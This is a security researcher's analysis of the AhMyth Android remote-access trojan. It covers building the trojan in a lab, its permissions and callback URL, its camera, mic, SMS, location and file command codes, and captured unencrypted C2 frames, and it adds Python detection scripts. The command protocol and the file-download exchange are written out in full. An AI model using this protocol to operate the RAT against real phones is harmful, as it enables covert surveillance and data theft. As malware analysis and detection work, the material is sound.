An In-Depth Look at How the AhMyth Android RAT Works

Originally published at:
https://xz.aliyun.com/t/14749
Original author:
T0daySeeker

Overview

Looking back recently, I realised I have been writing technical articles for quite a while now, close to 30 of them, covering Windows and Linux trojans: analysis of their communication models, decryption of their traffic, and reproduction of attack scenarios.

Even so, I always felt the coverage was missing analysis of Android trojans. I had tried before to study Android malware the way I had studied Windows and Linux samples, but never found a good case-study sample.

So I decided to fill that gap. After digging carefully through my browser bookmarks, I finally found a GitHub open-source project I had saved long ago: the AhMyth-Android-RAT remote access tool.

A quick survey of how this open-source RAT is used in the wild shows that a number of APT groups have employed it. For example, the report "Analysis of Transparent Tribe's recent attacks against the Indian military", published by the QiAnXin Virus Response Center on 2024-01-30, describes Transparent Tribe using AhMyth RAT as its mobile-side attack weapon. The relevant screenshot is in the original post.


To analyse the AhMyth-Android-RAT tool in depth, I approached it from the following angles:

  • Usage analysis of the open-source AhMyth-Android-RAT: build a simulated attack scenario by deploying AhMyth-Android-RAT on a Windows host and installing the Android trojan it generates in an Android emulator, then observe the trojan's check-in and the remote-control behaviour;
  • Function analysis of the RAT trojan: dissect the backdoor's functionality with the Android reverse-engineering tool JEB;
  • Communication model analysis: work out the tool's communication model from packet captures taken while AhMyth-Android-RAT is running.

Usage analysis of the open-source AhMyth-Android-RAT

Because AhMyth-Android-RAT is an open-source Android RAT, its source code and release builds can be downloaded directly from GitHub for study.

A brief look at the project shows:

  • AhMyth-Android-RAT was first released on 8 July 2017 and maintenance stopped on 4 September 2021;

  • The project is maintained by several contributors, has over 4,300 stars and has been forked by about 1,700 accounts;

  • There is currently only one release, v1.0-beta.1, which supports deployment on both Windows and Linux;

    The relevant screenshots are in the original post.


Generating the Android trojan

Before AhMyth-Android-RAT can be deployed and used, a Java environment must be configured on the host so that the tool can build the APK backdoor.

「Note: because AhMyth-Android-RAT dates back several years, I chose an older JDK build (jdk-8u121-windows-i586.exe) for the Java environment.」

With Java configured, download and install AhMyth-Android-RAT. Screenshot in the original post.


In the GUI, the [APK Builder] menu is where the Android trojan is customised. Screenshot in the original post.

「Note: AhMyth-Android-RAT can also bind the backdoor into a third-party APK file.」

Trojan check-in

Install the Android trojan in an Android emulator and tap to run it; the trojan then checks in to the server and keeps running hidden in the background. Screenshot in the original post.


In the AhMyth-Android-RAT GUI, select the [Victims] menu and start listening on the chosen port to accept the trojan's check-in request. Screenshot in the original post.


Remote control

Select a controlled device in the AhMyth-Android-RAT GUI to control it remotely. Screenshot in the original post.


Function analysis of the RAT trojan

To dissect the Android trojan generated by AhMyth-Android-RAT in more depth, I reverse-engineered it with JEB.

Manifest

Analysis of the backdoor's Manifest file shows the following core points:

  • The entry Activity of the backdoor is ahmyth.mine.king.ahmyth.MainActivity
  • The backdoor requests a large number of sensitive permissions, for example android.permission.READ_SMS, android.permission.SEND_SMS and android.permission.READ_CONTACTS

The relevant file contents are shown in a screenshot in the original post.

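The two Manifest observations above (launcher entry point plus a cluster of sensitive permissions) can be turned into a repeatable triage check. The following Python script is an added example of mine, not code from the article or from the AhMyth project. The manifest it parses is constructed for the example: the package name, entry Activity and the three permissions named above come from the article, the remaining permissions are plausible additions that match the functions analysed later (camera, mic, location, call logs); the capability-group threshold of four is my own assumption for what counts as suspicious.

```python
"""Triage an AndroidManifest.xml for surveillance-style permission clusters.

Added example, not part of the original article or the AhMyth project.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
A = "{%s}" % ANDROID_NS  # ElementTree prefix for android:* attributes

# Real Android permission names grouped by the capability they unlock.
CAPABILITY_GROUPS = {
    "sms": {"android.permission.READ_SMS", "android.permission.SEND_SMS",
            "android.permission.RECEIVE_SMS"},
    "contacts": {"android.permission.READ_CONTACTS"},
    "call_log": {"android.permission.READ_CALL_LOG"},
    "camera": {"android.permission.CAMERA"},
    "mic": {"android.permission.RECORD_AUDIO"},
    "location": {"android.permission.ACCESS_FINE_LOCATION",
                 "android.permission.ACCESS_COARSE_LOCATION"},
    "storage": {"android.permission.READ_EXTERNAL_STORAGE",
                "android.permission.WRITE_EXTERNAL_STORAGE"},
}

# CONSTRUCTED sample manifest: package, MainActivity and the SMS/contacts
# permissions are from the article; the other permissions are assumptions.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="ahmyth.mine.king.ahmyth">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.READ_CALL_LOG"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <application android:label="MyApp">
        <activity android:name="ahmyth.mine.king.ahmyth.MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
    </application>
</manifest>
"""


def parse_manifest(xml_text):
    """Extract package name, requested permissions and launcher activities."""
    root = ET.fromstring(xml_text)
    perms = sorted(e.get(A + "name") for e in root.iter("uses-permission"))
    launchers = []
    for act in root.iter("activity"):
        for flt in act.iter("intent-filter"):
            cats = {c.get(A + "name") for c in flt.iter("category")}
            if "android.intent.category.LAUNCHER" in cats:
                launchers.append(act.get(A + "name"))
    return {"package": root.get("package"), "permissions": perms,
            "launchers": launchers}


def capability_hits(permissions):
    """Names of capability groups for which at least one permission is requested."""
    granted = set(permissions)
    return sorted(g for g, needed in CAPABILITY_GROUPS.items() if granted & needed)


def triage(xml_text, threshold=4):
    """Flag an app that spans `threshold` or more surveillance capability groups."""
    info = parse_manifest(xml_text)
    info["capabilities"] = capability_hits(info["permissions"])
    info["suspicious"] = len(info["capabilities"]) >= threshold
    return info


if __name__ == "__main__":
    result = triage(SAMPLE_MANIFEST)
    print(result["package"], result["launchers"])
    print("capabilities:", result["capabilities"], "suspicious:", result["suspicious"])
```

A single benign app rarely needs SMS, contacts, call log, camera, microphone and location all at once, which is why counting distinct capability groups is a more robust signal than matching any one permission; the same routine can be pointed at the manifest extracted from an APK with apktool or JEB.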

Callback address

The C2 callback address is stored in the backdoor's ahmyth.mine.king.ahmyth.IOSocket class, and the URL also carries some basic information about the current device. The address is built as follows:

http://192.168.153.131:8080?model=" + Build.MODEL + "&manf=" + Build.MANUFACTURER + "&release=" + Build.VERSION.RELEASE + "&id=" + android_id

Code screenshot in the original post.


WebSocket communication

Once running, the backdoor initiates its outbound communication over WebSocket. Code screenshot in the original post.


Remote-control commands

Once running, the backdoor receives remote-control commands over the WebSocket connection. The commands are:

order      Remote-control function
x0000ca    Camera
x0000cl    Calls Logs
x0000cn    contacts
x0000fm    File Manager
x0000lm    Location
x0000mc    Mic
x0000sm    SMS

Code screenshot in the original post.


Camera function

ahmyth.mine.king.ahmyth.CameraManager is the code implementing the Camera remote-control function. Code screenshot in the original post.

Calls Logs function

ahmyth.mine.king.ahmyth.CallsManager is the code implementing the Calls Logs remote-control function. Code screenshot in the original post.

contacts function

ahmyth.mine.king.ahmyth.ContactsManager is the code implementing the contacts remote-control function. Code screenshot in the original post.

File Manager function

ahmyth.mine.king.ahmyth.FileManager is the code implementing the File Manager remote-control function. Code screenshot in the original post.

Location function

ahmyth.mine.king.ahmyth.LocManager is the code implementing the Location remote-control function. Code screenshot in the original post.

Mic function

ahmyth.mine.king.ahmyth.MicManager is the code implementing the Mic remote-control function. Code screenshot in the original post.

SMS function

ahmyth.mine.king.ahmyth.SMSManager is the code implementing the SMS remote-control function. Code screenshot in the original post.

Communication model analysis

Packet captures taken during the generated trojan's check-in and remote-control sessions confirm that the backdoor really does communicate over WebSocket.

WebSocket communication

The WebSocket session proceeds in two stages:

  • WebSocket connection establishment
  • Data transfer over the WebSocket protocol

The connection establishment is shown in a screenshot in the original post.

Once the WebSocket connection is established, all subsequent messages are carried in WebSocket frames (screenshot in the original post).

The WebSocket payloads are shown in a screenshot in the original post. 「Following the WebSocket stream in Wireshark is enough to view the payloads.」

Communication model analysis

Analysis shows that AhMyth-Android-RAT's traffic is carried directly in the WebSocket protocol without any encryption, so the communication data model can be worked out straight from the captured packets.

Actual examples of the exchanges follow:

  • Camera command
#Camera command
42["order",{"order":"x0000ca","extra":"camList"}]
#Camera command response
42["x0000ca",{"camList":true,"list":[{"name":"Back","id":0},{"name":"Front","id":1}]}]

42["order",{"order":"x0000ca","extra":1}]
  • File Manager command
#File Manager command
42["order",{"order":"x0000fm","extra":"ls","path":"/"}]
#File Manager command response
42["x0000fm",[{"name":"../","isDir":true},{"name":"vendor_dlkm","isDir":true,"path":"/vendor_dlkm"},{"name":"vendor","isDir":true,"path":"/vendor"},{"name":"system_ext","isDir":true,"path":"/system_ext"},{"name":"system","isDir":true,"path":"/system"},{"name":"sys","isDir":true,"path":"/sys"},{"name":"storage","isDir":true,"path":"/storage"},{"name":"sepolicy","isDir":false,"path":"/sepolicy"},{"name":"second_stage_resources","isDir":true,"path":"/second_stage_resources"},{"name":"sdcard","isDir":true,"path":"/sdcard"},{"name":"product","isDir":true,"path":"/product"},{"name":"proc","isDir":true,"path":"/proc"},{"name":"postinstall","isDir":true,"path":"/postinstall"},{"name":"pcgame","isDir":true,"path":"/pcgame"},{"name":"oem","isDir":true,"path":"/oem"},{"name":"odm_dlkm","isDir":true,"path":"/odm_dlkm"},{"name":"odm","isDir":true,"path":"/odm"},{"name":"mnt","isDir":true,"path":"/mnt"},{"name":"linkerconfig","isDir":true,"path":"/linkerconfig"},{"name":"lib","isDir":true,"path":"/lib"},{"name":"init.environ.rc","isDir":false,"path":"/init.environ.rc"},{"name":"init","isDir":false,"path":"/init"},{"name":"etc","isDir":true,"path":"/etc"},{"name":"dev","isDir":true,"path":"/dev"},{"name":"debug_ramdisk","isDir":true,"path":"/debug_ramdisk"},{"name":"data_mirror","isDir":true,"path":"/data_mirror"},{"name":"data","isDir":true,"path":"/data"},{"name":"d","isDir":true,"path":"/d"},{"name":"config","isDir":true,"path":"/config"},{"name":"cache","isDir":true,"path":"/cache"},{"name":"bugreports","isDir":false,"path":"/bugreports"},{"name":"bin","isDir":true,"path":"/bin"},{"name":"apex","isDir":true,"path":"/apex"},{"name":"acct","isDir":true,"path":"/acct"}]]
  • Location command
#Location command
42["order",{"order":"x0000lm"}]
#Location command response
42["x0000lm",{"enable":true,"lat":XXXXXXX,"lng":XXXXXXX}]
  • contacts command
#contacts command
42["order",{"order":"x0000cn"}]
#contacts command response
42["x0000cn",{"contactsList":[]}]
  • SMS command
#SMS command
42["order",{"order":"x0000sm","extra":"ls"}]
#SMS command response
42["x0000sm",{"smsList":[]}]
  • Calls Logs command
#Calls Logs command
42["order",{"order":"x0000cl"}]
#Calls Logs command response
42["x0000cl",{"callsList":[]}]
  • File Manager command - file download
#File Manager command
42["order",{"order":"x0000fm","extra":"ls","path":"/"}]
#File Manager command response
42["x0000fm",[{"name":"../","isDir":true},{"name":"vendor_dlkm","isDir":true,"path":"/vendor_dlkm"},{"name":"vendor","isDir":true,"path":"/vendor"},{"name":"system_ext","isDir":true,"path":"/system_ext"},{"name":"system","isDir":true,"path":"/system"},{"name":"sys","isDir":true,"path":"/sys"},{"name":"storage","isDir":true,"path":"/storage"},{"name":"sepolicy","isDir":false,"path":"/sepolicy"},{"name":"second_stage_resources","isDir":true,"path":"/second_stage_resources"},{"name":"sdcard","isDir":true,"path":"/sdcard"},{"name":"product","isDir":true,"path":"/product"},{"name":"proc","isDir":true,"path":"/proc"},{"name":"postinstall","isDir":true,"path":"/postinstall"},{"name":"pcgame","isDir":true,"path":"/pcgame"},{"name":"oem","isDir":true,"path":"/oem"},{"name":"odm_dlkm","isDir":true,"path":"/odm_dlkm"},{"name":"odm","isDir":true,"path":"/odm"},{"name":"mnt","isDir":true,"path":"/mnt"},{"name":"linkerconfig","isDir":true,"path":"/linkerconfig"},{"name":"lib","isDir":true,"path":"/lib"},{"name":"init.environ.rc","isDir":false,"path":"/init.environ.rc"},{"name":"init","isDir":false,"path":"/init"},{"name":"etc","isDir":true,"path":"/etc"},{"name":"dev","isDir":true,"path":"/dev"},{"name":"debug_ramdisk","isDir":true,"path":"/debug_ramdisk"},{"name":"data_mirror","isDir":true,"path":"/data_mirror"},{"name":"data","isDir":true,"path":"/data"},{"name":"d","isDir":true,"path":"/d"},{"name":"config","isDir":true,"path":"/config"},{"name":"cache","isDir":true,"path":"/cache"},{"name":"bugreports","isDir":false,"path":"/bugreports"},{"name":"bin","isDir":true,"path":"/bin"},{"name":"apex","isDir":true,"path":"/apex"},{"name":"acct","isDir":true,"path":"/acct"}]]
#File Manager command - choose a directory
42["order",{"order":"x0000fm","extra":"ls","path":"//sdcard"}]
#File Manager command - directory listing returned
42["x0000fm",[{"name":"../","isDir":true,"path":"/"},{"name":"DCIM","isDir":true,"path":"/sdcard/DCIM"},{"name":"Music","isDir":true,"path":"/sdcard/Music"},{"name":"Pictures","isDir":true,"path":"/sdcard/Pictures"},{"name":"Ringtones","isDir":true,"path":"/sdcard/Ringtones"},{"name":"Download","isDir":true,"path":"/sdcard/Download"},{"name":"$MuMu12Shared","isDir":true,"path":"/sdcard/$MuMu12Shared"},{"name":"Audiobooks","isDir":true,"path":"/sdcard/Audiobooks"},{"name":"Podcasts","isDir":true,"path":"/sdcard/Podcasts"},{"name":"Movies","isDir":true,"path":"/sdcard/Movies"},{"name":"Notifications","isDir":true,"path":"/sdcard/Notifications"},{"name":"Documents","isDir":true,"path":"/sdcard/Documents"},{"name":"Android","isDir":true,"path":"/sdcard/Android"},{"name":"Alarms","isDir":true,"path":"/sdcard/Alarms"},{"name":"Recordings","isDir":true,"path":"/sdcard/Recordings"},{"name":"Music_old","isDir":true,"path":"/sdcard/Music_old"},{"name":"Screenshots","isDir":true,"path":"/sdcard/Screenshots"}]]
#File Manager command - choose a directory
42["order",{"order":"x0000fm","extra":"ls","path":"//sdcard/Download"}]
#File Manager command - directory listing returned
42["x0000fm",[{"name":"../","isDir":true,"path":"/sdcard"},{"name":"2075.jpg","isDir":false,"path":"/sdcard/Download/2075.jpg"}]]
#File Manager command - download the selected file
42["order",{"order":"x0000fm","extra":"dl","path":"//sdcard/Download/2075.jpg"}]
#File Manager command - file content returned
451-["x0000fm",{"file":true,"name":"2075.jpg","buffer":{"_placeholder":true,"num":0}}].......JFIF.........(file payload omitted)......
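The order-code table and the captured frames above share one wire format, and a defender triaging a capture wants to turn raw frames into "who asked for what". The Python script below is an added example of mine, not code from the article or from the AhMyth project. The "42" and "451-" prefixes on the frames are Socket.IO packet framing carried over WebSocket: Engine.IO MESSAGE (4) followed by Socket.IO EVENT (2) or BINARY_EVENT (5) with a count of binary attachments before the dash, then a JSON array whose first element is the event name. The decoder maps "order" events to the function table from the article and treats events named after an order code as the victim's response; it also checks a check-in URL for the four query fields the IOSocket class embeds. The sample frames are taken from the captures shown above with the binary payload dropped, and the beacon URL values (device model, manufacturer, release, id) are constructed placeholders.

```python
"""Decode AhMyth-style Socket.IO-over-WebSocket text frames and check-in URLs.

Added example, not part of the original article or the AhMyth project.
"""
import json
import re
from urllib.parse import parse_qs, urlparse

# Order codes and the function each selects, as listed in the article.
ORDER_CODES = {
    "x0000ca": "Camera",
    "x0000cl": "Calls Logs",
    "x0000cn": "contacts",
    "x0000fm": "File Manager",
    "x0000lm": "Location",
    "x0000mc": "Mic",
    "x0000sm": "SMS",
}

# Socket.IO packet types (second digit of a frame).
SIO_TYPES = {"0": "CONNECT", "1": "DISCONNECT", "2": "EVENT", "3": "ACK",
             "4": "ERROR", "5": "BINARY_EVENT", "6": "BINARY_ACK"}

# <engine.io type><socket.io type>[<attachments>-][<namespace>,][<ack id>][json]
FRAME_RE = re.compile(
    r"^(?P<eio>\d)(?P<sio>\d)(?:(?P<att>\d+)-)?(?:(?P<ns>/[^,]*),)?"
    r"(?P<ack>\d*)(?P<body>\[.*\])?$", re.S)

# Query keys the client appends to its callback URL (from the IOSocket code).
BEACON_KEYS = {"model", "manf", "release", "id"}

# CONSTRUCTED samples: frames copied from the capture above (binary part of
# the last one dropped), beacon URL filled with placeholder device values.
SAMPLE_FRAMES = [
    '42["order",{"order":"x0000ca","extra":"camList"}]',
    '42["x0000ca",{"camList":true,"list":[{"name":"Back","id":0},{"name":"Front","id":1}]}]',
    '42["order",{"order":"x0000fm","extra":"dl","path":"//sdcard/Download/2075.jpg"}]',
    '451-["x0000fm",{"file":true,"name":"2075.jpg","buffer":{"_placeholder":true,"num":0}}]',
    "2",  # Engine.IO ping, carries no Socket.IO payload
]
SAMPLE_BEACON_URL = ("http://192.168.153.131:8080?model=PLACEHOLDER_MODEL"
                     "&manf=PLACEHOLDER_MANF&release=12&id=0123456789abcdef")


def parse_frame(text):
    """Split one text frame into Socket.IO type, event name, data and attachment count."""
    m = FRAME_RE.match(text)
    if not m or m.group("eio") != "4":
        return None  # not an Engine.IO MESSAGE packet (ping/pong/open/...)
    sio = m.group("sio")
    body = json.loads(m.group("body")) if m.group("body") else []
    event = body[0] if body and sio in ("2", "5") else None
    data = body[1] if event is not None and len(body) > 1 else None
    return {"type": SIO_TYPES.get(sio, "?"), "event": event, "data": data,
            "attachments": int(m.group("att") or 0)}


def classify(frame):
    """Return (direction, function, extra) for AhMyth traffic, else None."""
    if frame is None or frame["event"] is None:
        return None
    if frame["event"] == "order" and isinstance(frame["data"], dict):
        code = frame["data"].get("order")
        if code in ORDER_CODES:
            return ("server->victim", ORDER_CODES[code], frame["data"].get("extra"))
    if frame["event"] in ORDER_CODES:
        return ("victim->server", ORDER_CODES[frame["event"]], None)
    return None


def summarize(frames):
    """Decode a list of captured text frames and keep only the order/response pairs."""
    return [c for c in (classify(parse_frame(f)) for f in frames) if c]


def looks_like_ahmyth_beacon(url):
    """True when the query string carries all four device fields the client embeds."""
    return BEACON_KEYS <= set(parse_qs(urlparse(url).query))


if __name__ == "__main__":
    print("beacon:", looks_like_ahmyth_beacon(SAMPLE_BEACON_URL))
    for direction, function, extra in summarize(SAMPLE_FRAMES):
        print(f"{direction:15} {function:13} extra={extra!r}")
```

Because the article shows the traffic is unencrypted, a network sensor that reassembles WebSocket text frames can apply exactly this logic: an "order" event carrying one of the seven codes, or a reply event named after a code, is a high-confidence indicator, and the beacon-field check catches the check-in even before any order is issued.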


Originally published on the WeChat official account (T0daySeeker): 深度剖析AhMyth安卓远控工作原理 (An In-Depth Look at How the AhMyth Android RAT Works)

Copyright notice: posted by admin on 5 June 2024 at 8:01 am.